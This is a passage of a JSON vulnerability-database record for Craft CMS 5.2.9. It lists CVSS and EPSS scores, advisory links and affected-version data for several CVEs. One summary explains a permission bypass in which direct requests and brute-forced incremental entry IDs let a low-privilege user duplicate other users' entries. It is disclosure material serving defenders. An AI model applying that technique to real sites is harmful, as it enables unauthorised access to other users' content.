SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25491"},{"reference_url":"https://github.com/advisories/GHSA-7pr4-wx9w-mqwr","reference_id":"GHSA-7pr4-wx9w-mqwr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7pr4-wx9w-mqwr"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7pr4-wx9w-mqwr","reference_id":"GHSA-7pr4-wx9w-mqwr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7pr4-wx9w-mqwr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25491","GHSA-7pr4-wx9w-mqwr"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vvhc-rnpr-ubey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50642?format=json","vulnerability_id":"VCID-w9yn-1573-hyau","summary":"Craft CMS has Permission Bypass and IDOR in Duplicate Entry Action\nThe \"Duplicate\" entry action does not properly verify if the user has permission to perform this action on the specific target elements.\nEven with only \"View Entries\" permission (where the \"Duplicate\" action is restricted in the UI), a user can bypass this restriction by sending a direct request.\n\nFurthermore, this vulnerability allows duplicating **other users' entries** by specifying their Entry IDs. Since Entry IDs are incremental, an attacker can trivially brute-force these IDs to duplicate and access restricted content across the system.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13004","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/fb61a91357f5761c852400185ba931f51d82783d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/commit/fb61a91357f5761c852400185ba931f51d82783d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782","reference_id":"CVE-2026-28782","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782"},{"reference_url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28782","GHSA-jxm3-pmm2-9gf6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yn-1573-hyau"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.2.9"}